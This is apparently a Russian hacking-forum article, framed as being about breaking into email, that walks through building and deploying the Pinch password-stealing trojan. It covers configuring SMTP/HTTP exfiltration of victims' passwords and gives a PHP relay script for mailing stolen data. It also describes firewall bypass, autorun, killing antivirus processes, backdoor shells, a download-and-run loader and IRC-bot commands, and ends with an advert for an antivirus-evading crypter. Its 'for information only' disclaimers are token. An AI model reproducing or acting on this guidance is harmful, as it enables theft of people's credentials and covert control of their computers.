special

Ломаем мыло, юзаем BrutusAET2


МАТЕРИАЛ ВЫЛОЖЕН В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ. АВТОР НЕ НЕСЕТ НИКАКОЙ ОТВЕТСВТЕННОСТИ


------------------------------------------------------------------
часть 1. старое, но полезное. для пинч 1

***********************
Инструкция по Pinch 1.0
***********************

=====
Intro
=====

Прошу не удивляться, что я решил написать подобную статью (article for lamerzzz). Дело в том, что на моем форуме (http://forum.web-hack.ru) примерно раз в три дня создается тема, вроде "Как правильно настроить и использовать Pinch?", "Как пользоваться Pinch`ем?" и т.д.

===========
Возможности
===========

Данный троян получил довольно большое распространение в 2003/2004 году. Все благодаря возможности красть большое кол-во паролей (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ&AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), маленькому весу, открытым исходникам и легкостью создания троя для конкретной задачи. Троян имеет следующие возможности:

- Отправлять конфигурацию компьютера жертвы: ОС, оператика, CPU, HDD, logged user, host name, IP
- Шпион клавиатуры (Key-log)
- Удаленная консоль (Remote console)
- Обход Firewall`а
- Отправка всех паролей на E-mail используя SMTP-сервер
- Шифрование украденных паролей пересылаемых по почте
- Автоудаление трояна после запуска
- HTML/Text отчеты
- Размер файла примерно 10Kb
- Модульная система
- И многое другое...

Троян написал coban2k (http://www.cobans.net) - довольно известный человек в мире ICQ-хакинга. По причине проблем с хостингом по поводу хранения трояна на их сервере, автор был вынужден убрать это творение с своего сайта. К сожалению уже почти все антивирусы находят этот трой и его можно впарить только жертве, у которой не стоит антивируса.

============
Комплектация
============

В архив (pinch_1.0.zip) с трояном входят следующие папки и файлы:

\PinchBuilder.exe - мастер для создания трояна
\Parser.exe - программа для расшифровки закодированных писем с паролями
\readme.txt - без комментариев
\Pinch\ - главная папка с asm-исходниками трояна и компилятором
\Sources\ - остальные исходники
\TB!2 Plugin (Auto-parser)\ - папка с плагином для The Bat 2!, который декодирует зашифрованные письма с паролями, приходящими на ваш почтовый ящик
\Sources\Script\ - PHP-скрипт, через который отсылаются пароли при выборе соответствующей опции при компиляции (читайте далее)

================
Компилируем трой
================

В комплекте поставляется специальный мастер (PinchBuilder.exe), который и занимается созданием трояна по вашим требованиям и компиляцией трояна прямо на вашем компьютере. Программа имеет две главные вкладки: Compile и Decrypt. Первая служит для создания трояна, а вторая для расшифровки паролей (по сути эта вкладка является результатом работы файла Parser.exe). Далее идут три под-вкладки: SMTP, HTTP и FILE. В них задаются вариант вывода паролей. Разберем каждую подробнее:

========
SMTP
========

В поле Server вводим адрес (hostname/ip) SMTP-сервера. Если вы ввели домен сервера, то нажмите Resolve, чтобы домен сервера принял вид IP-адреса. Далее в полях From и To указываем свое мыло. Кнопка Send test massage служит для тестовой отправки письма, через настройки указанные вами. Настоятельно рекомендую ей воспользоваться. Если письмо не приходит, то это значит, что есть какие то проблемы с отправкой (включенный фаерволл, плохой SMTP, не нажали на Resolve и т.д.).

Хочу заметить, что последнее время большинство провайдеров переходят на систему, по которой их клиенты могут отправить письма ТОЛЬКО с ИХ SMTP-вервера. В таких случаях рекомендую пользоваться методом отправки писем, через HTTP.

====
HTTP
====

Закачиваем файл \Sources\Script\view.php на сервер поддерживающий PHP-скрипты и исполняющие функцию mail(). Далее в поле URL указываем путь к этому скрипту (например, http://www.xss.ru/pinch.php). В поле Subject указываем имя темы, с которой будут оправляться письма. В поле Status check str должна находиться строка, которая выдается скриптом после его загрузки. В скрипте идущем в комплекте с троем оно имеет значение: _ret_ok_1 :

<script language="JavaScript">
window.status="_ret_ok_1";
</script>

Если данное значение не будет принято трояном, то он будет пытаться отправить письмо через этот скрипт каждую минуту, пока не получит в ответ строку из поля Status check str. Я вам рекомендую использовать скрипт не из стандартной поставки, а написанный мной:

<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
mail($email,$subject,$msg, "From: $email");}
?>
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
</body></html>

Делает он почти тоже самое, но более грамотно написан. Огромным плюсом при использовании данного метода отправки паролей являеся, тот факт, что он позволяет отправлять пароли в обход Firewall`а. Как это достигается? Вот вырезка из лога outpost`а в момент отправки пароля через скрипт с моего сайта:

Имя процесса: iexplorer.exe
Протокол: HTTP
Удаленный адрес: www.web-hack.ru

Я думаю все поняли, кто не в танке =) Так же из плюсов я могу я могу выделить возможность записывать зашифрованные письма на вашем сайте, а не отправлять на мыло; возможность менять мыло на которое отсылаются пароли, на случай если его удалят; при массовой рассылке троя (чтобы пароли могли быть отправлены даже с тех провайдеров, где отключен доступ ко всем SMTP-серверам, кроме их него)

====
FILE
====

На данный вкладке задается путь к файлу, в который сохранятся все пароли. Для этого в поле Path надо записать путь к файл (например, C:\password.txt).

================
Compiler Options
================

В данной области все понятно, тут надо просто поставить галочки в тех полях, где вам это требуется. Стоит обратиться внимание на поле Add Icon. В нем указывает путь к иконке с которой будет отображаться скомпилированный троян. Хочу заметить что на моей системе (Windows XP) мне так и не удалось скомпилировать троя с этой включенной опцией и ее пришлось отключить.

В полях Protocol указываем метод, которым будут отправляться пароли (SMTP/HTTP/FILE). Далее нажимаем кнопку Compile и должна пойти компиляция трояна, который сохранится в основную папку с мастером для его создания.

===================
Расшифровка паролей
===================

Допустим вам удалось впарить ламеру этот трой и вам на мыло пришли пароли с машины жертвы. Дело в том, что при пересылке пароли шифруются и их для начала надо расшифровать (если у вас не установлен специальный плагин к TheBat! описанный выше). Копируем в буфер обмена текст с закодированными паролями, открываем Parser.exe (или вкладку Decrypt в PinchBuilder.exe) и нажимаем в контекстном меню пунк Process Data (или просто нажимаем комбинацию клавиш Alt+C). Далее программа выдаст вам все данные украденные у жертвы с удобном виде. Далее вы можете их сохранить или распечатать.

==========
Заключение
==========

Хочу вас предостеречь, что при использовании данного трояна вы сразу попадает под 273 статью УК РФ и можете быть серьезно наказаны ;-) Я (автор статьи) не несу никакой ответственности за вред, который может быть нанесен каким либо лицам после прочтения моей статьи.


----------------------------------------

часть 2. инструкция к пинч 2.58

Небольшая статейка по элементарной настройки пинча. Не судите строго, но критикуйте во весь рот. Статья по настройке Pinch 2.58.

Думаю, что с crack-ом проблем нет ниукаво, так как там подробнейший help и даже видео прилагается. Я же хочу показать как в Билдере настраивать трой:

SMTP Properties
Server (вводишь, в твоём случае smtp.mail.ru), потом обязательно нажимаешь Resolve чтобы оно преобразовалось в IP (кстати. все махинации надо проводить при подключённом интернете)

Port - оставляй как и есть

Protocol - выбор как будет получаться отчёт, по SMTP, HTTP (через php) и FILE - сохраняться на компьютере. Одноимённые кнопки (SMTP, HTTP, FILE) настройка протоколов, но нас в данном случае интересует SMTP и его мы уже настроили..

Кнопка TestSend отправка тестового сообщения на mail.

Вкладка PWD - прёт пароли из перечисленных программ. Пункт ENABLE PWD при снятии галки отчёты не будут содержать пароли.
Галка Don't send old report - не слать старые отчёты.
Галки Encrypt и Packing взаимосвязанные. FSG, UPX, MEW выбор способа упаковки.

Вкладка RUN - выбор способов автозапуска. Думаю разберёшься в ней. Запучкать как.... standart, DLL, Undelate Service. Переместить в папку..... или сам указываешь или выбираешь одну из системных. Справа столбец Values я его и не трогал и честно говоря смутно представляю зачем он. Снизу справа - bypass Windows Firewall (SP2) - обходить системный файрвол в SP2 (на сколько я знаю механизм этого пункта - это он запускается, как iexplorer.exe )

Вкладка SPY - какие то дополнительные отчёты - у меня оно не работало. Пунктик screen spy - взятие скриншота, но опять же у меня оно не работало (сркин присылался, но он был пустой)

Вкладка NET - я ей не пользовался. Она предназначена для того чтобы:
1. Открыть какой-либо порт на заражённом компе, и соответственно получить к нему доступ (настоятельно Несоветую этим пользоваться, если не зашифруешься, если тебя поймают, то сам догадываешься что будет... )
2. Downloader - указание прямой ссылки на какой-либо файл который должен скачаться и запуститься (прикинь, какие расходы понесёт твой враг если у него траффик...... ))))
3. AutoUpdate - автообновление - трой, по завершении работы, скачивает свою копию, а потом самоудаляется и на следующую загрузку системы, запускается уже новая копия (это для пущей надёжности. что бы его не нашли.

Вкладка BD (backdoor) - консоль открывает шелл на выбранном порту, управление через телнет(telnet.exe) или альтернативные проги. (сам не пробовал)

Вкладка ECT - склейка с каким-либо файлом, а так же установка иконки... Так же можно сделать, что бы, выскакивало сообщение... Но что-то не работает...

Вкладка KILL - убийство кокого-либо процесса (можно попробовать и антивирус убить) , например "spidernt" - и тогда отключится монитор DrWEB-а (предупреждаю, я это ещё не далал, но попробую)

Вкладка IE - установка на браузер своей стартовой страницы. Добавление страницы в Избранное....

Вкладка WORM - шо цэ таке, я не ведую... .....

Вкладка IRC-bot - доступ к компу через IRC:
.login авторизация
.die - завершение работы бота
.download - скачка файла с урла
.httpd - открыть доступ к файлу через http на определенном порту
.killthread - завершение определенной задачи
.proxy - открытие сокс4 с на выбранном порту с выбранным id
.raw - отсылка raw текста на данный irc сервер
.remove - самоудаление
.restart - перезапуск
.run - запускать команды
.scan - сканирование IP адресов на определенные открытые порты
.shell - открытие шелла на определенном порту (не в 95/98/ME)
.status - показать версию, IP, дату запуска
.threads - показать активные задачи
.update - самообновление бота со специального урла
.visit - посетить выбранный урл скрыто
.url - посетить выбранный урл открыто
.link - добавить в favorits
.sp - сделать стартовой
.msg - сообщение(messagebox)

Вот вроде бы всё.... Нажимаешь COMPILE и у тебя в папке с билдером появляется трой...

УДАЧИ!!!!!

P.S. Это, типа, всё написано для ознакомления и автор не несёт никакой ответственности за последствия...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Особенности крипта:
Используется полиморный криптор
Обход KIS и Outpost (в том числе последние версии)
Самоудаление
Уменьшение размера (Обычный пинч уменьшается на 3-6кб, лоадер zupacha на 60-80кб)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Дата створення/оновлення: 25.05.2018

';